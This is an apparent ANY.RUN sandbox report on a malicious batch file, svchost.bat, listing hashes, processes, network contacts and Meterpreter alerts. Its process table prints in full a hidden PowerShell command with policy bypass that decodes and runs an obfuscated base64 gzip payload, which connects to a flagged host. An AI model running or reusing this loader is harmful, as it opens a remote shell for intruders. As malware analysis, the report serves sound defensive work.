File name: | svchost.bat |
Full analysis: | https://app.any.run/tasks/695b26ea-6ae9-426d-8da3-59699b12a255 |
Verdict: | Malicious activity |
Analysis date: | July 12, 2020, 12:01:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | 9BDE49DF5FB69CB3027A8F6EC6DE5CC2 |
SHA1: | FE09F69B9E6796C0A5CC8C11819A869E3525675C |
SHA256: | 0BF71C0D2AD81A902303062CE754C2256FE8B3B6A7A4D136EBE7E18720FFC25D |
SSDEEP: | 48:hka13mXiixlEVCHqTyXtXVrOLikdQbrRLnxqh/bkCI:r1ixlEVCKTyXFZO+kdQn9kh/bkv |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1880 | cmd /c ""C:\Users\admin\AppData\Local\Temp\svchost.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2740 | powershell.exe -ep bypass -noni -nop -w hidden "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAN4lB18CA51W227jNhB991cMXHUtIRbhBOlLgCzqVbJtgOyusXKbB8NAaGocq5FJlaR8aeJ/LylRlhwn2KZ6sUXOnDk8c6F+gpFYo5wXHEK4k6nWyGG2hU/mZ1xIjhI+wBVdIfxOZbLtdIwl06ng8Bvq8A5nLEuRa+g8dcA83prBJXzFdfht9hcyDeF4m+NXukSzqImxj0r72pj8ofAK57TIdCQxMTspzZSB8LQscG81kmKzJS8szHprpbbt7BqKeX20zhOU+yMq6dKv/k9iLVP+MPUisVxSnvQPV2OVMcFfLF6JNc8ETcrVwGFKwVApcAIsRVJkaAn+6gdQmaRz8OswEOLf0J2lPOkG5WblV/pmqTLyG8kvTcit+b8kVrVYsEfUioxZfusspufnx25EaSq1jerilrsuQZctuyFjmGsDVyXDr4js3iIrcYVS4THfPXQr4a/xjkYuUDdPTv+ZEZ51++fnLmqn0k1piXRpaVaoxNRXXK4Zeg2xKi0VL1siXZeFFiulsrgGe4MYssKU+pbEtanv4ve9uakl7PtP3tig7yCkCiYHPt9xKTRGKHU6TxnV+CfN0oTagotols0oe5wGwSt0yLDQC1ut1mmojiQJWklr1GhO05ZrMttqnEynnv21xTYg5GxgnuefnwY7pyjypN72Jxo3miBnIrGVfHExjKObm8Cq/Mna+N07U5Jirap5EC8wy0AWnBtrMBoUypRlF07AQ766sG/cNvWJWTPp2G8wscwL3Wze80jkW5k+LDT4UQBng9Nf4EvKpFBiriESMhey1I7A0Ea0lgokmgArTMg9v+eu7pwmxA4p9JvT9Qf95oXcIn/Qi3bF1D3brpmjknmfVJOTKdwaSKuN63ey5/l+rrXXZyGvKVsYzhUopHw/TxqrhrZ9/IMxHJD6tNXEqpGC5xu+Eo8YXm9yo60yeu9Rdodt+C4leqMYeibPJYtbwcpMBmRE9cKs9j72/nfq1os0Q9/30rIHKvfvSBO/qvg+DPrgHfgFEHKEwVFury19TMbmKG9dTW40WBNSHvHaHblBMQ1OLZUWmptQpcz1ccBLgxdlZeaB1fIoARDWQ7YCP/v44RSe4VuhwwoVnBQHUGdQClIDG5F/kALoNSAbS8RDKYWcDKYHwVqsy33CMqTSD15jcNl+MY2/6Rx30n8qnwbmh63TLpWjxql9PmeFWuxvXTcG3XUSZUKhO09zE8Za5PX1Z74cOvsvhn1y3OUHobt57AD5F8Ks40A1CQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GMJAFZS4D9MV4VQZVK6K.temp | — | |
MD5:— | SHA256:— | |||
2740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf671d.TMP | binary | |
MD5:9513FB270E7972038EE17F3493D0A5D7 | SHA256:D50920EB996BF5E30355DCAAAF151A1FB0B5C85E7CF41C1EF67149FE6A7FD9B7 | |||
2740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:9513FB270E7972038EE17F3493D0A5D7 | SHA256:D50920EB996BF5E30355DCAAAF151A1FB0B5C85E7CF41C1EF67149FE6A7FD9B7 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2740 | powershell.exe | 109.237.221.83:44 | pd1zb.nl | Mihos | NL | malicious |
Domain | IP | Reputation |
---|---|---|
pd1zb.nl |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2740 | powershell.exe | Exploitation attributes have been detected | SHELL [PTsecurity] Meterpreter TCP session opened: RSA2048 key exchange |
2740 | powershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
2740 | powershell.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2740 | powershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
2740 | powershell.exe | Exploitation attributes have been detected | SHELL [PTsecurity] Meterpreter TCP session opened: RSA2048 key exchange |